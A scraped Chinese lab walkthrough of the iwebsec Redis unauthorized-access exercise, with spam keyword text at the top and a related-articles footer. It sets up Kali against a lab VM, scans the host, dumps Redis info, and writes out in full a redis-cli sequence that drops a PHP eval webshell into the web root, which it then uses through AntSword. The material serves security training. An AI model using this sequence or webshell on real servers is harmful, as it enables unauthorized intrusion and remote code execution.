国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

iwebsec靶場 數據庫漏洞通關2-Redis數據庫漏洞

這篇具有很好參考價值的文章主要介紹了iwebsec靶場 數據庫漏洞通關2-Redis數據庫漏洞。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

iwebsec靶場的redis漏洞為未授權漏洞,如下所示。

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞

一、Redis未授權漏洞原因

那么這個未授權漏洞的原理是什么呢?Redis 默認情況下,會綁定在 0.0.0.0:6379,如果沒有進行采用相關的策略,比如添加防火墻規(guī)則避免其他非信任來源 ip 訪問等,這樣將會將 Redis 服務暴露到公網上,如果在沒有設置密碼認證(一般為空)的情況下,會導致任意用戶在可以訪問目標服務器的情況下未授權訪問 Redis 以及讀取 Redis 的數據。

簡單說,漏洞的產生條件有以下兩點:
(1)redis綁定在 0.0.0.0:6379,且沒有進行添加防火墻規(guī)則避免其他非信任來源ip訪問等相關安全策略,直接暴露在公網;
(2)沒有設置密碼認證(一般為空),可以免密碼遠程登錄redis服務

二、滲透環(huán)境搭建

首先在自己的機器搭建滲透環(huán)境,Kali虛擬機系統作為攻擊方,iwebsec的ubuntu虛擬機作為滲透靶場,為了保證兩臺機器可以互通,將兩臺虛擬機都設置為vmnet8的nat方式連接。

1.Kali系統作為攻擊方配置環(huán)境

在進行滲透的過程中,使用Kali作為攻擊主機,首先需要kali系統使用redis客戶端連接到靶機的redis服務器,即攻擊端需要安裝redis客戶端。

(1)Kali攻擊主機環(huán)境配置

使用ifconfig -a命令獲取ip地址,這里選擇vmnet8網段的192.168.71.129

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞

?這樣如果靶機啟動redis服務進程后,就可以使用測試攻擊機Kali中的redis-cli程序和靶機的redis服務交互了。

(2)既然使用kali系統作為攻擊主機,那么攻擊機需要可以使用redis-cli程序來連接靶機的redis服務程序。于是需要使用apt-get install redis-server安裝redis,為避免安裝失敗可以先進行update,如下所示

sudo apt-get update
sudo apt-get install redis-server -y

安裝過程如下所示

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞

(3) 安裝成功后執(zhí)行redis-cli -h確認安裝是否成功

sudo redis-cli -h

?當展示出如下界面時,代表安裝redis成功

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞
?

?2.獲取靶機Redis服務器的ip地址與開啟的端口號

?(1)打開iwebsec虛擬機,通過ifconfig -a確認kali可以訪問的同一網段的ip地址,如下所示這里選擇使用vmnet8同一網段的ip地址192.168.71.151

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞

(2)打開iwebsec靶場,如下所示關卡的最后一關為redis數據庫漏洞

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞

點開后效果如下,提示redis端口為6379,用戶名密碼為空,正好滿足前面我們講過的redis未授權漏洞存在的前提。

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞

3.獲取redis服務器的端口號

如上圖所示,iwebsec實際上是使用docker搭建的,也就是說這個ubuntu虛擬機中通關docker搭建的iwebsec靶場。docker中開啟的redis端口與這臺ubuntu虛擬靶機之間具有端口映射關系,這個端口映射是一一對應關系。接下來要做的就是通過docker命令查詢這個映射關系,以確定docker中的iwebsec在ubuntu中的端口號是什么

1)通過首先使用docker ps獲取到容器的id

docker ps

運行結果如下,docker容器的id為bc23a49cb37c

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞

?如上端口號中有0.0.0.0:6379->6379/tcp,也就是說docker容器中的3306端口號映射到ubuntu虛擬機的6379端口號,那么也就是說通過訪問ubuntu的6379端口即可訪問到靶機的Redis服務

2)在ubuntu iwebsec虛擬機中此時使用netstat -ano|grep 6379時

netstat -ano|grep 6379

如下顯示出此端口已經打開

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞

三、Redis滲透

1.Kali使用Nmap掃描靶機

我們在攻擊機使用nmap嘗試掃描靶機,命令如下

nmap 192.168.71.151 -p 6379

看看是否能掃描出redis服務端口號

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞

2.Redis敏感信息獲取

kali攻擊機(模擬redis客戶端)執(zhí)行命令,

sudo redis-cli -h 192.168.71.151

?連接成功后在出現的交互界面中輸入info

info

效果如下

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞

?如上所示,直接獲取到靶機redis服務的敏感信息

3.Redis上傳webshell獲取控制權

接下來打算在網站根目錄下放置一個webshell

(1)在網站的根目錄/var/www/html下寫一個webshell腳本,配置方法為

config set dir /var/www/html

(2)腳本名稱為shell.php

config set dbfilename shell.php

(3)腳本內容為<?php @eval($_POST['cmd']); ?>

set webshell "<?php @eval($_POST['cmd']); ?>"

綜上整體滲透腳本為

sudo redis-cli   -h   192.168.71.151
config set dir /var/www/html
config set dbfilename shell.php
set webshell "<?php @eval($_POST['cmd']); ?>"
save

滲透交互如下所示

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞

?(4)使用瀏覽器訪問webshell,執(zhí)行cmd=phpinfo()獲取服務器的php信息,如下所示
由于webshell腳本被放到根目錄中,故而webshell的url鏈接為?http://192.168.71.151/shell.php?
post參數為 cmd=phpinfo();

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞

?如上所示滲透成功

(5)蟻劍驗證webshell上傳成功

如下所示,webshell的url鏈接為?http://192.168.71.151/shell.php 連接密碼為cmd

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞

?新增后效果如下,選擇文件管理

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞

如下所示,滲透成功

iwebsec的中間件漏洞,iwebsec靶場,web安全,redis未授權漏洞,redis漏洞,iwebsec靶場,未授權漏洞文章來源地址http://www.zghlxwxcb.cn/news/detail-705840.html

到了這里,關于iwebsec靶場 數據庫漏洞通關2-Redis數據庫漏洞的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 數據庫安全-Redis未授權&Hadoop&Mysql&未授權訪問&RCE 漏洞復現

    數據庫安全-Redis未授權&Hadoop&Mysql&未授權訪問&RCE 漏洞復現

    未授權訪問漏洞可以理解為需要安全配置或權限認證的地址、授權頁面存在缺陷導致其他用戶可以直接訪問從而引發(fā)重要權限可被操作、數據庫或網站目錄等敏感信息泄露,包括端口的未授權常見頁面的未授權 /admin.php /menu.php 常見的未授權訪問漏洞及默認端口: 默認端口統

    2024年02月03日
    瀏覽(24)
  • 全面了解文件上傳漏洞, 通關upload-labs靶場

    全面了解文件上傳漏洞, 通關upload-labs靶場

    upload-labs是一個專門用于學習文件上傳漏洞攻擊和防御的靶場。它提供了一系列模擬文件上傳漏洞的實驗環(huán)境,用于幫助用戶了解文件上傳漏洞的原理和防御技術。 這個靶場包括了常見的文件上傳漏洞類型,如文件名欺騙、文件類型欺騙、文件上傳功能繞過等。通過練習不同

    2024年02月04日
    瀏覽(18)
  • 文件上傳漏洞之upload-labs靶場實戰(zhàn)通關

    文件上傳漏洞之upload-labs靶場實戰(zhàn)通關

    目錄 pass-01 pass-02 pass-03 pass-04 pass-06 pass-07 pass-08 pass-09 pass-10 pass-11 pass-12 pass-13 pass-14 pass-15 pass-16 pass-17 pass-18 pass-19 pass-20 pass-21 ? pass-01 ? pass-02 前端刪除完驗證函數后通過burp修改?content-type的類型 ? pass-03 pass-04 本pass禁止上傳.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|

    2023年04月08日
    瀏覽(23)
  • 【網絡安全 --- xss-labs靶場通關(1-10關)】詳細的xss-labs靶場通關思路及技巧講解,讓你對xss漏洞的理解更深刻

    【網絡安全 --- xss-labs靶場通關(1-10關)】詳細的xss-labs靶場通關思路及技巧講解,讓你對xss漏洞的理解更深刻

    靶場安裝請參考以下博客,既詳細有提供工具: 【網絡安全 --- xss-labs靶場】xss-labs靶場安裝詳細教程,讓你鞏固對xss漏洞的理解及繞過技巧和方法(提供資源)-CSDN博客 【網絡安全 --- xss-labs通關】xss-labs靶場通關,讓你鞏固對xss漏洞的理解及繞過技巧和方法(提供資源) h

    2024年02月08日
    瀏覽(23)
  • 【MySQL新手到通關】第一章 數據庫概述

    【MySQL新手到通關】第一章 數據庫概述

    持久化(persistence): 把數據保存到可掉電式存儲設備中以供之后使用 。大多數情況下,特別是企 業(yè)級應用, 數據持久化意味著將內存中的數據保存到硬盤上加以”固化” ,而持久化的實現過程大多 通過各種關系數據庫來完成。 持久化的主要作用是 將內存中的數據存儲在關

    2024年02月07日
    瀏覽(27)
  • web安全-文件上傳漏洞-圖片馬制作-相關php函數講解-upload靶場通關詳細教學(3)

    web安全-文件上傳漏洞-圖片馬制作-相關php函數講解-upload靶場通關詳細教學(3)

    制作圖片馬有兩種方法,一種是文本方式打開,末尾粘貼一句話木馬,令一種是使用命令進行合成。 方法1 首先準備好一個圖片(這里是1.png)。 將一個圖片以文本格式打開(這里用的Notepad++,以記事本方式打開修改也能連接成功,不過修改后圖片無法正常顯示了)。 后面粘

    2024年02月06日
    瀏覽(20)
  • 【數據庫通關之路】 MySQL 全路線學習知識點梳理(上)

    【數據庫通關之路】 MySQL 全路線學習知識點梳理(上)

    這是一篇 MySQL 通關 硬核經驗學習路線,包括數據庫相關知識,SQL語句的使用,數據庫約束,設計等。專為小白整理,針對數據庫零基礎的朋友們,手把手帶你學習MySQL,讓你輕松學會! 文末包郵送《WPS Office高效辦公:數據處理與分析 》1本(點擊下方目錄直達),本文每+1000瀏覽

    2024年02月04日
    瀏覽(22)
  • 【數據庫通關之路】 MySQL 全路線學習知識點梳理(下)

    【數據庫通關之路】 MySQL 全路線學習知識點梳理(下)

    本文是MYSQL零基礎小白學習系列的第三篇文章,點此閱讀 上一篇文章 文末 包郵隨機送《MySQL數據庫進階實戰(zhàn) 》 五本 (點擊下方目錄直達) 目的:主鍵是一行數據的唯一標識,要求非空且唯一 添加約束: 建完表后添加主鍵約束: 刪除約束: 目的:保存數據時,未指定值則采

    2024年02月04日
    瀏覽(22)
  • 【數據庫通關之路】 MySQL 全路線學習知識點梳理(中)

    【數據庫通關之路】 MySQL 全路線學習知識點梳理(中)

    本文是 MYSQL零基礎小白學習 系列的第二篇文章,點此閱讀 上一篇文章 文末包郵送《分布式中間件核心原理與RocketMQ最佳實踐 》 (點擊下方目錄直達)一本,本文每+1000瀏覽額外加抽一人 需求 :設計包含如下信息的學生表,請注重數據類型、長度的合理性。 編號 姓名,姓名最

    2023年04月20日
    瀏覽(21)
  • 數據庫中間件對比

    相當于把中間件作為一個獨立的服務了,它將接收到的SQL 語句做了一些特定的分析:如分片分析、路由分析、讀寫分離分析、緩存分析等,然后將此 SQL 發(fā)往后端的真實數據庫,并將返回的結果做適當的處理,最終再返回給用戶。 中間件在Driver或者連接池的基礎之上,增加了

    2024年02月12日
    瀏覽(20)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包